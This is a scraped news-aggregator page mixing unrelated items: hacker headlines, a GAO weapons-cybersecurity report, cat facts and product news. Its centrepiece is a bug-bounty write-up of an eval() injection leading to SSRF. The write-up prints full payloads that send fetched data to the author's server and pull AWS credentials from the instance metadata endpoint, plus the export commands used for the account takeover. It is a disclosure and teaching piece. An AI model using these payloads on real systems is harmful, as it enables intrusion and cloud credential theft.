Next Page: 10000

          Students Play a Knee Slapping Cover of the Classic Journey Song ‘Don’t Stop Believing’ on Boomwhackers      Cache   Translate Page      

HarvardTHUD, a group of percussively talented undergraduate students in Cambridge, Massachusetts, performed a truly respectable, knee slapping cover of the classic Journey song “Don’t Stop Believing” on interchangeable Boomwhackers. We’re a student-run organization at Harvard College that likes to get together on Monday evenings and hit things. We play everything with percussive potential: drum set...

The post Students Play a Knee Slapping Cover of the Classic Journey Song ‘Don’t Stop Believing’ on Boomwhackers appeared first on Laughing Squid.


          Pentagon slow to protect weapon systems from cyber threats: U.S. agency      Cache   Translate Page      
The Pentagon has been slow to protect major weapon systems from cyber attacks and routinely found critical vulnerabilities that hackers could potentially exploit in those systems, a federal government report said on Tuesday.

          Comentario en Oración a Santa Bárbara para lograr un favor imposible contra Injusticias, Maldades y Traiciones por minecraft free download 2018      Cache   Translate Page      
Hi there! I just wanted to ask if you ever have any problems with hackers? My last blog (wordpress) was hacked and I ended up losing months of hard work due to no back up. Do you have any methods to prevent hackers?
          Students Play a Knee Slapping Cover of the Classic Journey Song ‘Don’t Stop Believing’ on Boomwhackers      Cache   Translate Page      

HarvardTHUD, a group of percussively talented undergraduate students in Cambridge, Massachusetts, performed a truly respectable, knee slapping cover of the classic Journey song “Don’t Stop Believing” on interchangeable Boomwhackers. We’re a student-run organization at Harvard College that likes to get together on Monday evenings and hit things. We play everything with percussive potential: drum set...

The post Students Play a Knee Slapping Cover of the Classic Journey Song ‘Don’t Stop Believing’ on Boomwhackers appeared first on Laughing Squid.


          Low Priority of Cybersecurity Gives Hackers Access to US Weapons Systems – Audit      Cache   Translate Page      
WASHINGTON (Sputnik) - Hackers working with the US Department of Defense (DOD) were able to take control of major weapons systems now under development, in part because US officials have failed to make cybersecurity a priority, according to an audit by the General Accountability Office (GAO) on Tuesday.
          Reactie op De ComplotConcurrent – Uitzending 28 “De Russische Hackers Hoax” (8-10-2018) door Freeflip      Cache   Translate Page      
Russies gehakt hahahaha
          Hunton Insurance Head Comments On Hotel Data Breach Coverage Dispute      Cache   Translate Page      
Hunton Andrews Kurth insurance practice head, Walter Andrews, recently commented to the Global Data Review regarding the infirmities underlying an Orlando, Florida federal district court’s ruling that an insurer does not have to defend its insured for damage caused by a third-party data breach. The decision in St. Paul Fire & Marine Ins. Co. v. Rosen Millennium Inc., which involved a claim for coverage under two general liability insurance policies, turned on whether or not customers’ credit card information obtained from the insured’s payment system had been “made known” and by whom.  According to the district court, the insurance policies required that the credit card information be “made known” by the insured, however in this instance, the publication was made by the third-party hackers.  As Andrews explained, however, although it was undisputed that Florida law controlled interpretation of Millennium’s policies,…
          22 fatos impressionantes sobre os gatos      Cache   Translate Page      
Você sabia que um físico já colocou seu gato como co-autor de seu artigo porque ele acidentalmente escreveu “nós” em vez de “eu” ao longo de seu trabalho e não se preocupou em mudar? Também, acredite ou não, o governo britânico possui um cargo chamado “Caçador de Ratos do Gabinete Oficial” (Chief Mouser To The Cabinet Office) que só pode ser ocupado por um gato? E mesmo que isso, talvez, não te surpreenda, ainda por cima existe um estudo que provou que gatos são mais do que capazes de reconhecerem as vozes dos seus donos (ou servos?), mas muitas vezes escolhem simplesmente ignorá-los. Veja abaixo mais fatos interessantes sobre gatos nesse compilado que trouxemos para você! Não esqueça de nos dizer qual seu favorito.


Veja:

  1. Gato FatoEm 1985 Freddie Mercury lançou um álbum solo que era dedicado “ao meu gato Jerry; Também ao Tom, Oscar e Tiffany, e a todos os amantes de gatos ao redor do mundo – fodam-se todos os outros”
  2. Gato FatoDurante a noite, a Disneylândia é invadida por gatos de rua. A Disney acolhe eles porque eles mantém “baixa” a população de ratos e os tratam como seus, incluindo a castração e vacinas.
  3. Gato FatoO Guinness de Recordes Mundiais parou de premiar o gato, ou qualquer outro animal, mais obeso do mundo para desencorajar a alimentação excessiva e deliberada dos bichinhos.

  4. Gato FatoSempre que um gato fecha e abre seus olhos de forma lenta, ou pisca para você, significa que ele confia em você e o reconhece como um amigo.

  5. Gato FatoMuitos abrigos não permitem adoção de gatos pretos pela época de Halloween pelo medo de que esses sejam sacrificados ou torturados em algum ritual.

  6. Gato FatoA primeira transmissão de rádio em voo foi “Roy, venha aqui e pegue esse maldito gato”.
  7. Gato FatoUm estudo que provou que gatos são mais do que capazes de reconhecerem as vozes dos seus donos, mas muitas vezes escolhem ignorá-los.
  8. Gato FatoGatos adultos só miam para se comunicarem com adultos.
  9. Gato FatoOs dois gatos mais velhos em recorde viveram até 38 e 34 anos de idade. Ambos pertenciam ao mesmo dono e viviam numa dieta a base de bacon, ovos, brócolis e café.
  10. Gato FatoTer um gatinho pode reduzir em 1/3 os riscos de um derrame ou ataque cardíaco.
  11. Gato FatoO cérebro de um gato é 90% similar ao humano – mais similar que o dos cachorros.
  12. Gato FatoO Presidência Lincoln amava gatos e uma vez os deixou comer na mesa de jantar da Casa Branca, durante um jantar formal.
  13. Gato Fato
  14. O hacker mais procurado do mundo foi uma vez hackeado porque sua senha era o nome do seu gato + 123.
  15. Gato FatoExiste uma raça de gatos, chamada Lykoi, na qual eles parecem lobisomens.
  16. Cat FactOs gatos dormem 70% de suas vidas.
  17. Cat FactUm gato doméstico é mais veloz que o Usain Bolt.
  18. Cat FactUm gato pode passar mais da metade dos seu tempo acordado lambendo a si mesmo ou àqueles com quem ele se importa.
  19. Cat FactGatos pretos são considerados sinal de azar nos Estados Unidos, mas são sinal de boa sorte no Reino Unido e no Japão.
  20. Cat FactUm gato se esfrega nas pessoas para marcar território.
  21. Cat FactA razão pela qual gatos e cobras possuem pupilas verticais é porque isso melhora sua percepção profunda durante as caçadas noturnas.

  22. Cat Fact65-85% dos gatos brancos nascidos com os dois olhos azuis são surdos.

          Comment on Clash of Clans Hack apk, Unlimited Money, Gems And more… Todo ilimitado, Hack apk Clash of clans by HackeRar Pro      Cache   Translate Page      
Me pregunto si funcionara Bv.<br />Buen video amigo
          AWS takeover through SSRF in JavaScript      Cache   Translate Page      

Here is the story of a bug I found in a private bug bounty program on Hackerone. It toke me exactly 12h30 -no break- to find it, exploit and report. I was able to dump the AWS credentials, this lead me to fully compromise the account of the company: 20 buckets and 80 EC2 instances (Amazon Elastic Compute Cloud) in my hands. Besides the fact that it’s one of my best bug in my hunter career, I also learnt alot during this sprint, so let’s share!

Intro

As I said, the program is private so the company, let’s call it: ArticMonkey.
For the purpose of their activity -and their web application- ArticMonkey has developed a custom macro language, let’s call it: Banan++. I don’t know what language was initially used for the creation of Banan++ but from the webapp you can get a JavaScript version, let’s dig in!

The original banan++.js file was minified, but still huge, 2.1M compressed, 2.5M beautified, 56441 lines and 2546981 characters, enjoy. No need to say that I didn’t read the whole sh… By searching some keywords very specific to Banan++, I located the first function in line 3348. About 135 functions were available at that time. This was my playground.

Spot the issue

I started to read the code by the top but most of the functions were about date manipulation or mathematical operations, nothing really insteresting or dangerous. After a while, I finally found one called Union() that looked promising, below the code:

helper.prototype.Union = function() {
   for (var _len22 = arguments.length, args = Array(_len22), _key22 = 0; _key22 < _len22; _key22++) args[_key22] = arguments[_key22];
   var value = args.shift(),
    symbol = args.shift(),
    results = args.filter(function(arg) {
     try {
      return eval(value + symbol + arg)
     } catch (e) {
      return !1
     }
    });
   return !!results.length
  }

Did you notice that? Did you notice that kinky eval()? Looks sooooooooooo interesting! I copied the code on a local HTML file in order to perform more tests.

Basically the function can take from 0 to infinite arguments but start to be useful at 3. The eval() is used to compare the first argument to the third one with the help of the second, then the fourth is tested, the fifth etc… Normal usage should be something like Union(1,'<',3); and the returned value true if at least one of these tests is true or false.
However there is absolutely no sanitization performed or test regarding the type and the value of the arguments. With the help of my favourite debugger -alert()- I understood that an exploit could be triggered in many different ways:

Union( 'alert()//', '2', '3' );
Union( '1', '2;alert();', '3' );
Union( '1', '2', '3;alert()' );
...

Find an injection point

Ok so I had a vulnerable function, which is always good, but what I needed was a input to inject some malicious code. I remembered that I already seen some POST parameters using Banan++ functions so I performed a quick search in my Burp Suite history. Got it:

POST /REDACTED HTTP/1.1
Host: api.REDACTED.com
Connection: close
Content-Length: 232
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3502.0 Safari/537.36 autochrome/red
Content-Type: application/json;charset=UTF-8
Referer: https://app.REDACTED.com/REDACTED
Accept-Encoding: gzip, deflate
Accept-Language: fr-FR,fr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: auth=REDACTED

{...REDACTED...,"operation":"( Year( CurrentDate() ) > 2017 )"}

Response:

HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8
Content-Length: 54
Connection: close
X-Content-Type-Options: nosniff
X-Xss-Protection: 1
Strict-Transport-Security: max-age=15768000; includeSubDomains
...REDACTED...

[{"name":"REDACTED",...REDACTED...}]

The parameter operation seems to be a good option. Time for testing!

Perform the injection

Since I didn’t know anything about Banan++, I had to perform some tests in order to find out what kind of code I could inject or not. Sort of manual fuzzing.

{...REDACTED...,"operation":"'\"><"}
{"status":400,"message":"Parse error on line 1...REDACTED..."}
{...REDACTED...,"operation":null}
[]
{...REDACTED...,"operation":"0"}
[]
{...REDACTED...,"operation":"1"}
[{"name":"REDACTED",...REDACTED...}]
{...REDACTED...,"operation":"a"}
{"status":400,"message":"Parse error on line 1...REDACTED..."}
{...REDACTED...,"operation":"a=1"}
{"status":400,"message":"Parse error on line 1...REDACTED..."}
{...REDACTED...,"operation":"alert"}
{"status":400,"message":"Parse error on line 1...REDACTED..."}
{...REDACTED...,"operation":"alert()"}
{"status":400,"message":"Function 'alert' is not defined"}
{...REDACTED...,"operation":"Union()"}
[]

What I conclued here was:

  • I cannot inject whatever JavaScript I want
  • I can inject Banan++ functions
  • the response seems to act like a true/false flag depending if the interpretation of parameter operation is true or false (which was very useful because it helped to validate the code I injected)

Let’s continue with Union():

{...REDACTED...,"operation":"Union(1,2,3)"}
{"status":400,"message":"Parse error on line 1...REDACTED..."}
{...REDACTED...,"operation":"Union(a,b,c)"}
{"status":400,"message":"Parse error on line 1...REDACTED..."}
{...REDACTED...,"operation":"Union('a','b','c')"}
{"status":400,"message":"Parse error on line 1...REDACTED..."}
{...REDACTED...,"operation":"Union('a';'b';'c')"}
[{"name":"REDACTED",...REDACTED...}]
{...REDACTED...,"operation":"Union('1';'2';'3')"}
[{"name":"REDACTED",...REDACTED...}]
{...REDACTED...,"operation":"Union('1';'<';'3')"}
[{"name":"REDACTED",...REDACTED...}]
{...REDACTED...,"operation":"Union('1';'>';'3')"}
[]]

Perfect! If 1 < 3 then the response contains valid datas (true), but if 1 > 3 then the response is empty (false). Parameters must be separated by a semi colon. I could now try a real attack.

fetch is the new XMLHttpRequest

Because the request is an ajax call to the api that only returns JSON datas, it’s obviously not a client side injection. I also knew from a previous report that ArticMonkey tends to use alot JavaScript server side.

But it doesn’t matter, I had to try everything, maybe I could trigger an error that would reveal informations about the system the JavaScript runs on. Since my local testing, I knew exactly how to inject my malicious code. I tried basic XSS payloads and malformed JavaScript but all I got was the error previously mentionned.

I then tried to fire an HTTP request.

Through ajax call first:

x = new XMLHttpRequest;
x.open( 'GET','https://poc.myserver.com' );
x.send();

But didn’t receive anything. I tried HTML injection:

i = document.createElement( 'img' );
i.src = '<img src="https://poc.myserver.com/xxx.png">';
document.body.appendChild( i );

But didn’t receive anything! More tries:

document.body.innerHTML += '<img src="https://poc.myserver.com/xxx.png">';
document.body.innerHTML += '<iframe src="https://poc.myserver.com">';

But didn’t receive anything!!!

Sometimes you know, you have to test stupid things by yourself to understand how stupid it was… Obviously it was a mistake to try to render HTML code, but hey! I’m just a hacker… Back to the ajax request, I stay stuck there for a while. It toke me quite a long time to figure out how to make it work.

I finally remembered that ArticMonkey uses ReactJS on their frontend, I would later learnt that they use NodeJS server side. Anyway, I checked on Google how to perform an ajax request with it and found the solution in the official documention which lead me to the fetch() function which is the new standard to perform ajax call, that was the key.

I injected the following:

fetch('https://poc.myserver.com')

And immediately got a new line in my Apache log.

Being able to ping my server is a thing but it’s a blind SSRF, I had no response echoed back. I had the idea to chain two requests where the second would send the result of the first one. Something like:

x1 = new XMLHttpRequest;
x1.open( 'GET','https://...', false );
x1.send();
r = x1.responseText;

x2 = new XMLHttpRequest;
x2.open( 'GET','https://poc.myserver.com/?r='+r, false );
x2.send();

Again it toke me while to get the correct syntax with fetch(). Thanks StackOverflow.

I ended with the following code which works pretty well:

fetch('https://...').then(res=>res.text()).then((r)=>fetch('https://poc.myserver.com/?r='+r));

Of course, Origin policy applies.

SSRF for the win

I firstly tried to read local files:

fetch('file:///etc/issue').then(res=>res.text()).then((r)=>fetch('https://poc.myserver.com/?r='+r));

But the response (r parameter) in my Apache log file was empty.

Since I found some S3 buckets related to ArticMonkey (articmonkey-xxx), I thought that this company might also use AWS servers for their webapp (which was also confirmed by the header in some responses x-cache: Hit from cloudfront). I quickly jump on the list of the most common SSRF URL for Cloud Instances.

And got a nice hit when I tried to access the metadatas of the instance. aws takeover through ssrf in javascript

Final payload:

{...REDACTED...,"operation":"Union('1';'2;fetch(\"http://169.254.169.254/latest/meta-data/\").then(res=>res.text()).then((r)=>fetch(\"https://poc.myserver.com/?r=\"+r));';'3')"}

Decoded output is the directory listing returned:

ami-id
ami-launch-index
ami-manifest-path
block-device-mapping/
hostname
iam/
...

Since I didn’t know anything about AWS metadatas, because it was my first time in da place. I toke time to explore the directories and all files at my disposition. As you will read everywhere, the most insteresting one is http://169.254.169.254/latest/meta-data/iam/security-credentials/<ROLE>. Which returned:

{
  "Code":"Success",
  "Type":"AWS-HMAC",
  "AccessKeyId":"...REDACTED...",
  "SecretAccessKey":"...REDACTED...",
  "Token":"...REDACTED...",
  "Expiration":"2018-09-06T19:24:38Z",
  "LastUpdated":"2018-09-06T19:09:38Z"
}

Exploit the credentials

At that time, I though that the game was ended. But for my PoC I wanted to show the criticity of this leak, I wanted something really strong! I tried to use those credentials to impersonate the company. You have to know that they are temporary credentials, only valid for a short period, 5mn more or less. Anyway, 5mn is supposed to be enough to update my own credentials to those ones, 2 copy/paste, I think I can handle that… err…

I asked for help on Twitter from SSRF and AWS master. Thank guys, I truely appreciate your commitment, but I finally found the solution in the UserGuide of AWS Identity and Access Management. My mistake, except to not read the documentation (…), was to only use AccessKeyId and SecretAccessKey, this doesn’t work, the token must also be exported. Kiddies…

$ export AWS_ACCESS_KEY_ID=AKIAI44...
$ export AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI...
$ export AWS_SESSION_TOKEN=AQoDYXdzEJr...

Checking my idendity with the following command proved that I was not myself anymore.

aws sts get-caller-identity

And then…
aws takeover through ssrf in javascript

Left: listing of the EC2 instances configured by ArticMonkey. Probably a big part -or the whole- of their system.

Right: the company owns 20 buckets, containing highly sensitive datas from customers, static files for the web application, and according to the name of the buckets, probably logs/backups of their server.

Impact: lethal.

Timeline

06/09/2018 12h00 - beginning of the hunt
07/09/2018 00h30 - report
07/09/2018 19h30 - fix and reward

Thanks to ArticMonkey for being so fast to fix and reward, and agreed this article :)

Conclusion

I learnt alot because of this bug:

  • ReactJS, fetch(), AWS metadatas.
  • RTFM! The official documentation is always a great source of (useful) informations.
  • At each step new problems appeared. I had to search everywhere, try many different things, I had to push my limits to not give up.
  • I now know that I can fully compromise a system by myself starting from 0, which is a great personal achievement and statisfaction :)

When someone tells you that you’ll never be able to do something, don’t waste your time to bargain with these peoples, simply prove them they’re wong by doing it.


          Comentário sobre Curso de Hacker por Paulo Tacio      Cache   Translate Page      
Sim, este e todos os cursos e pacotes estão disponíveis a pronta entrega. O Kurumin é apenas para mostrar uma distribuição Linux 100% brasileira, durante o curso as distribuições que serão mais utilizadas são Ubuntu e Kali Linux. Qualquer dúvida entre em contato conosco.
          Comentário sobre Curso de Hacker por Paulo Tacio      Cache   Translate Page      
Sim, não só o curso de hacker mas todos os cursos e pacotes estão disponíveis a pronta entrega. Qualquer dúvida entre em contato conosco.
          Comentário sobre Curso de Hacker por Marceo      Cache   Translate Page      
O curso ainda está no ar?
          Comentário sobre Curso de Hacker por Marceo      Cache   Translate Page      
O curso ainda está no ar? ainda usam Kurumin, não está descontinuado?
          Pentagon slow to protect weapon systems from cyber threats: U.S. agency      Cache   Translate Page      
The Pentagon has been slow to protect major weapon systems from cyber attacks and routinely found critical vulnerabilities that hackers could potentially exploit in those systems, a federal government report said on Tuesday. Reported by Reuters 43 minutes ago.
           Comment on Tips & Notices – October 2018 by E.M.Smith       Cache   Translate Page      
From: https://www.theregister.co.uk/2018/10/08/super_micro_us_uk_intelligence/ We have: “In the situation Bloomberg describes, the so-called compromised servers were allegedly making outbound connections. Apple's proprietary security tools are continuously scanning for precisely this kind of outbound traffic, as it indicates the existence of malware or other malicious activity. Nothing was ever found.” My presumption was based on that "security tools" kit having caught something in time, and no foul happened then they punted to the Feds. This assertion is "nothing happened". 2 choices: 1) It happened and is being denied to let the sting play out. Very Plausible. 2) Story is wrong. Also very plausible. No way to choose absent more evidence. What I'm happy about: The Apple statement confirms their IDS / IPS is looking for that stuff. Just what I'd expect (and what I'd do...) . Unknown bit: This was directed at Siri and was pre-production in discovery. It is possible the Engineers caught it and that it never reached legal or IS&T Production... We did a LOT of stuff in ATG that never got communicated to legal or IS&T... I never told them about our Russian Hacker or the bounce off us to the Mil site in Hawaii.. So I'd add the 3rd choice of "It happened, only a few folks know"... and it's most likely IMHO.
          Puigdemont suspendió la DUI sin la oferta de mediación que alegó      Cache   Translate Page      

El 1-O se vivió en el Palau de la Generalitat una suma de realidades. Por ejemplo, en el último piso del noble edificio, el Govern ubicó a una veintena de 'hackers'. Ellos fueron la infantería en la guerra digital que se mantenía con el Estado. Una estrategia que se combinaba, por ejemplo, con un 'call-center' ubicado en Londres que es el que respondía las dudas que asaltaban a quienes controlaban los colegios electorales. En ese 1-O hubo, incluso, tiempo para la táctica. A medida que avanzaba el reloj y se hacía evidente que habría grueso electoral suficiente como para dar unos resultados y que, una vez hechos públicos, servían para proclamar la independencia, quien más quien menos empezó a echar cálculos sobre qué día sería el señalado para pasar a la historia.

Seguir leyendo....


          The Trouble With Cybersecurity Management      Cache   Translate Page      
Cybersecurity is becoming top of mind for customers and organizations, as highly publicized data breaches and cyberattacks at large corporations have revealed just how much damage a hacker can do by accessing or manipulating an organization’s systems. In addition to the immediate financial and operational consequences, a breached business often faces class-action lawsuits, regulatory fines, […]
          Russia's 2016 Cyberattack: What We Do, Don't And May Never Know      Cache   Translate Page      

There has yet to be a thorough investigation into exactly how much the Russian influence campaign affected the outcome of the 2016 election. The national intelligence community is prohibited from looking into domestic politics and Congress has refused to take up the cause.

So, University of Pennsylvania professor Kathleen Hall Jamieson has decided to try fill that void. In a new book she attempts to find out exactly what we do, don’t, and may never know. The book is called “Cyberwar: How Russian Hackers and Trolls Helped Elect a President.”


          Facebook releases smart video chat speakers amid user privacy concern      Cache   Translate Page      

Facebook releases smart video chat speakers amid user privacy concern

DF-Xinhua Report

U.S. social media giant Facebook Monday unveiled a pair of artificial intelligence-powered smart video chat devices, Portal and Portal +, which are designed to connect people and feel like being in the same room.

   Facebook said the new video communication speakers with tablet-size screens for the home can dramatically change the way people keep in touch and their built-in AI technology makes video calling easier and more like hanging out.

   The debut of the Facebook-brand-bearing electronic gadgets represents the social network's first bold entry into the fray in a competition of consumer hardware with other internet giants such as Amazon and Google, which launched their smart speakers years ago.

   The Portal, which is equipped with a 10-inch 1280x800 display, can let users video chat with their families and friends over Facebook Messenger, while the Portal + has a 15-inch 1920x1080 pivoting display.

   Facebook said the two speakers are powered by AI as well as smart camera and sound technology that let users have a better, more convenience and hands-free experience. The speaker's Smart Camera can sense the movement and action, and automatically pans and zooms to keep everyone in view.

   While the two Facebook-branded hardware makes consumers' home smarter and better connected with family members, there is growing concern about user privacy that could arise from internet-related technology, especially after Facebook has been questioned about its privacy policy since a data breach scandal earlier this year.

   Facebook has been extensively challenged about its security measures in protecting users' sensitive data since a British data mining firm Cambridge Analytica was accused of illegally accessing the data of 87 million Facebook users without their knowledge.

   Facebook CEO Mark Zuckerberg was summoned to a hearing in U.S. Congress in April to explain the firm's privacy policies.

   Last month, Facebook reported vulnerabilities in its account login mechanism that could affect more than 90 million users, who risked having their private information including names and passwords accessed by hackers.

© DAILY FINLAND Developed by : orangebd
#source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000
          Quinton William Thacker      Cache   Translate Page      
GATE CITY, VA - Quinton William Thacker 80, of Gate City went to be with the Lord on Monday, October 8, 2018 at Holston Valley Medical Center.
          Reminder: Exactly One Week Ago The New York Times Exposed Trump's Tax "Fraud"      Cache   Translate Page      
Trump continues to be a DDoS-style attack on our democracy's normal circuits of accountability. by Eli Sanders
Trumps small loan of $1 million from his dad was, in truth, worth more than $60 million.
Trump's "small loan" of $1 million from his dad was, in truth, worth more than $60 million. Joe Raedle / Getty Images

One week ago today, The New York Times demolished the self-made billionaire myth that helped Donald Trump become president. How come it already feels as if the Times story never happened?

Yes, there's a lot else going on. Yes, a lot of people already assumed (correctly) that Trump, who lies about pretty much everything, probably lied about his origin story, too. But it takes a certain "method" to make sure a story as big as this Times investigation disappears quickly from the public consciousness, argues journalism professor Jay Rosen:

Read Rosen's whole thread here. He's describing what other people have cast as kind of DDoS attack on our democracy's normal circuits of accountability.

"Flooding the system with too much news, much of it misleading or simply false, not only reduces the weight of any individual story; it has the further effect of keeping opponents in a pop-eyed state of outrage, which in turns shows supporters a hateful image of the other side," Rosen writes.

In this light, patient focus—including the focus it takes to read an article as long as this one—constitutes a form of resistance.

[ Comment on this story ]

[ Subscribe to the comments on this story ]


          "In my interview with Rener Gracie, whose grandfather established the Gracie Jiu-Jitsu method 90 years ago, he told me there are four phases to nearly all sexual attacks on women..."      Cache   Translate Page      
"... 1) Identify an unsuspecting target, 2) Subdue the target, 3) Exhaust the target, and 4) Execute the sexual assault. We want to fight with all our might and the moves we have above in the second phase. In the third phase, however, right before an assailant executes his sexual attack, all he wants to do is exhaust the victim and gain complete control, so fighting back actually may backfire at that point, wasting energy. Gracie’s Women Empowered training program teaches women to recognize when they’ve entered that phase where they are truly trapped and are no longer in the defensive movements phase—and to feign giving in. Pretend to be compliant (kind of like playing dead for a bear). In those split moments, the predator will think you have given up and will loosen his grip, giving you a chance get away."

From "Basic Self-Defense Moves Anyone Can Do (and Everyone Should Know)" (LifeHacker).
          Pentagon slow to protect weapon systems from cyber threats: U.S. agency      Cache   Translate Page      
The Pentagon has been slow to protect major weapon systems from cyber attacks and routinely found critical vulnerabilities that hackers could potentially exploit in those systems, a federal government report said on Tuesday.

          Armamento americano é vulnerável a ciberataques      Cache   Translate Page      

Relatório de auditoria do governo culpa atraso do Pentágono em matéria de cibersegurança e dificuldades encontradas para recrutar especialistas. Equipamento militar está cada vez mais conectado, o que os torna mais eficazes, mas também mais vulneráveis a ataques. Imagem aérea do Pentágono, em foto de 12 de fevereiro de 2009 AP Photo/Charles Dharapak O armamento americano é vulnerável a ciberataques em razão do atraso do Pentágono em matéria de cibersegurança e das dificuldades encontradas para recrutar especialistas, assinala um relatório de auditoria do governo publicado nesta terça-feira (9). No documento intitulado "O Departamento de Defesa está apenas começando a se dar conta da amplitude das vulnerabilidades", o escritório de contas do Congresso dos Estados Unidos, GAO, destaca que o equipamento militar do país está cada vez mais conectado. Os caças estão repletos de programas de informática e sensores, o comando operacional é feito por um telão, os soldados são localizados em terra graças ao seu GPS, e os navios da Marinha americana estão cada vez mais computadorizados, indica o relatório. Esses programas e sensores fazem com que os militares sejam mais eficazes, mas também mais vulneráveis a ataques informáticos. Especialistas do Pentágono que serviram como hackers mostraram como foi fácil invadir os novos equipamentos produzidos entre 2012 e 2017. "Em um caso, foi necessária apenas uma hora para uma equipe de duas pessoas penetrar no sistema de computador de um armamento, e um dia para controlar completamente o seu funcionamento", indica o GAO, sem especificar, por razões de segurança, a que armamento faz referência. Em outro caso, os analistas do Pentágono assumiram o controle dos terminais usados durante um exercício. A equipe pôde não só controlar o sistema, como manipulá-lo ao ponto de os operadores virem em sua tela uma janela que pedia a introdução de uma moeda para poder continuar. O Departamento de Defesa "não sabe a extensão das vulnerabilidades de seus sistemas de armamento porque, por uma série de razões, o alcance e a sofisticação dos testes foram limitados". O Pentágono começou a perceber a gravidade dos perigos e a necessidade de aumentar a proteção dos sistemas informáticos, mas tem problemas para recrutar especialistas, que são mais bem pagos no setor privado do que nas Forças Armadas, destaca o documento, o primeiro sobre este tema do GAO. Um dos planos consiste em contratar jovens diplomados antes de terminar a universidade, a fim de oferecer uma primeira oportunidade profissional e tirar proveito de seus conhecimentos. Em um momento no qual os países ocidentais acusam a Rússia de ter realizado ciberataques de grande envergadura nos últimos meses, o secretário de Defesa dos Estados Unidos, James Mattis, anunciou que os EUA decidiram colocar à disposição da Otan as suas capacidades em matéria de defesa cibernética.
          Out of the classroom and into the mire: a hacking competition for cyber security students - Telstra Exchange (blog)      Cache   Translate Page      

Telstra Exchange (blog)

Out of the classroom and into the mire: a hacking competition for cyber security students
Telstra Exchange (blog)
Talk about being thrown in the deep end – it may be years before they toss their academic hats in the air, and yet 427 university and TAFE students have been snatched out of cyber security classrooms and thrown behind computers to find and fight real ...


          Hackers norcoreanos atacaron bancos y trataron de robar US$1.100 millones      Cache   Translate Page      
El grupo, que FireEye identificó como APT38, se ha infiltrado en más de 16 organizaciones en 11 países.
          Как составить рацион, чтобы поддерживать мозг в тонусе      Cache   Translate Page      
Как составить рацион, чтобы поддерживать мозг в тонусеОтрывок из книги «Диета для ума» нейробиолога и нутрициолога Лайзы Москони, которая изучила вопрос во всех подробностях.
          5 лучших офлайновых карт для Android      Cache   Translate Page      
До последнего времени в Google Maps отсутствовал офлайновый режим, и благодаря этому у него появилось несколько сильных конкурентов, которые такую возможность предлагали. В этой статье вы найдёте краткий обзор мобильных картографических приложений для Android, которые умеют работать без подключения к Cети.
          Почему подъёмы в 6 утра не помогут вам стать успешным и что делать вместо этого      Cache   Translate Page      
Личный опыт успешного предпринимателя показал: гуру продуктивности могут ошибаться.
          PlayStation 4: Sony verklagt Hacker wegen Verkauf von Jailbreak Konsolen      Cache   Translate Page      
Sony hat Klage gegen einen Hacker erhoben, der PlayStation Konsolen modifiziert und verkauft.
          North Korean hackers tried to steal $1.1-billion in attacks on banks      Cache   Translate Page      
A North Korean hacking group has tried to steal at least $1.1-billion in a series of attacks on global banks over the past four years, according to cybersecurity firm FireEye.

          Amazon Employee Fired for Leaking Customer Data, Exposing a Search Flaw or Both?      Cache   Translate Page      

Amazon revealed a breach of customer data last week, but it wasn’t a data breach of the usual variety. Rather than falling prey to a cyberattack or having hackers exploit unsecured code, customer email addresses were leaked by an employee to an online reseller in exchange for money. What you need to know: 1.) A […]

The post Amazon Employee Fired for Leaking Customer Data, Exposing a Search Flaw or Both? appeared first on Adam Levin.


          Google+ wird bis August 2019 eingestellt      Cache   Translate Page      
Quelle: Wikipedia (gemeinfrei)
Gestern machte eine Meldung auf vielen SL‑Blogs die Runde, von der auch ich direkt betroffen bin. Google stellt sein soziales Netzwerk Google+ bis August nächsten Jahres ein. Für mich ist das die einzige Plattform, auf der ich neben meinem Blog noch regelmäßig etwas gepostet habe. Facebook kommt für mich aus verschiedenen Gründen nicht in Frage und mit Twitter konnte ich mich nie so richtig anfreunden, obwohl ich oft auf Meldungen von dort in meinen Blogposts verlinkt habe.

Der Grund für die Schließung soll ein Datenleck sein, das von Hackern ausgenutzt wurde, um die Kontoinformationen von 500.000 Nutzern zu stehlen. Das soll schon im März dieses Jahres passiert sein. Doch Google hat diese Information bis gestern nicht an seine Kunden weitergegeben. Die Schließung von Google+ wurde dann als Unterpunkt in der Bekanntgabe des Datenlecks verpackt.

Quelle: Google+
Geschlossen wird nur die Privatnutzer-Version von Google+. Die kostenpflichtige Enterprise-Version soll fürs Erste weiter bestehen bleiben. Mit dem Abschalten der Funktionen von Google+ will man schon in einigen Wochen beginnen. Das endgültige Ende ist für den August 2019 angekündigt. Zusätzlich werden auch noch weitere Funktionen für Google Accounts eingeschränkt bzw. umgestellt.

Ich finde es langsam ätzend, wie Google mit seinen Kunden umgeht. Sie sind wohl der Ansicht, dass man als eine der drei größten Firmen der Welt auf nichts mehr Rücksicht nehmen muss. In den letzten Jahren war ich persönlich schon von der Einstellung von iGoogle (RSS-Reader) und Picasa (Online Fotodatenbank) betroffen. Nun folgt Google+. Sollte auch noch Blogger dichtmachen, gebe ich jede Aktivitäten im Web auf. Insgesamt ist Google permanent am Schließen von Diensten, die bei vielen beliebt sind, wie diese Liste aus den letzten fünf Monaten zeigt.

Zu all diesem Blödsinn von Google passt auch ein Artikel auf Golem vom Mai 2018: Google verabschiedet sich von "Don't be evil". Im Grunde ist Google inzwischen kein Deut mehr besser als Facebook...

Links:


          5 SaaS Security Best Practices for Developers       Cache   Translate Page      

The majority of applications being used today are SaaS (Software as a Service) solutions accessed via the cloud. The convenience of apps such as Google’s G-Suite, Salesforce, Basecamp and others brings with it the challenge of securing all the data being transmitted by millions of people every day. The growing demand for SaaS and cloud-based solutions is increasing opportunities for hackers to steal sensitive information. Recent high-profile security breaches include 2017’s Equifax Read More..
          Theo Prellwitz より “組長 Boss KUMICHO” へのコメント      Cache   Translate Page      
Hello! I know this is kinda off topic but I was wondering which blog platform are you using for this website? I'm getting sick and tired of Wordpress because I've had problems with hackers and I'm looking at options for another platform. I would be great if you could point me in the direction of a good platform.
          Comment on Hacker, Developer, User In Cydia, Which One To Choose? [Cydia “Who Are You?” Screen] by Qamar Hussain      Cache   Translate Page      
what is the generation key for it can anyone tell me the key ?
          Comment on Hacker, Developer, User In Cydia, Which One To Choose? [Cydia “Who Are You?” Screen] by Yakser      Cache   Translate Page      
